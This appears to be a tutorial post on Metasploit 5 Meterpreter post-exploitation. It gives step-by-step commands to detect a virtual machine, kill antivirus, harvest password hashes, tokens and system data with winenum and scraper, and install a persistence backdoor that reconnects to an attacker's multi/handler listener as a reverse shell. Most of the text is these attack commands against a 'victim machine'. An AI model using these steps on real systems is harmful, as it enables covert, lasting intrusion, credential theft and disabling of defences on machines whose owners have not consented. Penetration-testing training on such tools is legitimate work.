Metasploit 5

Metasploit 5

Meterpreter part 2

8- checkvm
To check if the remote system is a Vitrual machine

run checkvm

The target system is actually a virtual machine ruuning on VMware

9- killav
To kill antivirus

run killav

10- windows enumration
Collecting all information about the target machine such as (username , running process , tokens, network information , hardware information,groups, network route,firewall configuration,hash passwords, etc...)

run winenum

As mentioned the output is located in /root/.msf4/logs/scripts/winenum/BTRACK .....
To view the tokens

11- scraper
To collect information about the target machine such as (username , hash passwords, system info , etc...)

run scraper

12- persistence (backdoor)
Persistence is a backdoor allow you to connect back again anytime to the victim machine , because the user may patch the vulnerable services and you no longer can access to victim machine easily
so you have to install a backdoor on the victim machine to get access easily anytime

To list all options
persistence -h

-A Automatically start a machine multi/handler to connect to the agent
-L Location in target host where to write payload, if none %TEMP% will be used
-P Payload to use, default is windows/meterpreter/reverse_tcp
-S Automatically start the agent on boot as a service(with SYSTEM privileges)
-T Alternate executable templete to use
-U Automatically start the agent when the user logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back

To install persistence backdoor on the victim machine

run persistence -X -i 40 -p 4445 -r

Now the backdoor is installed on the victim machine

Now we kill the session to see if the persistence can connect back to the local host (attacker)

To show all open sessions
session -l
suppose that the open session with the victim ( is session 1
now let's kill session 1
session -k 1

Now we lost the connection with the victim machine

To connect back by using backdoor we must first run multi/handler to listen and wait for a reverse connection from backdoor

use exploit/multi/handler

Then let's set the local address and local port
set LPORT 4445

And we have a meterpreter session again ...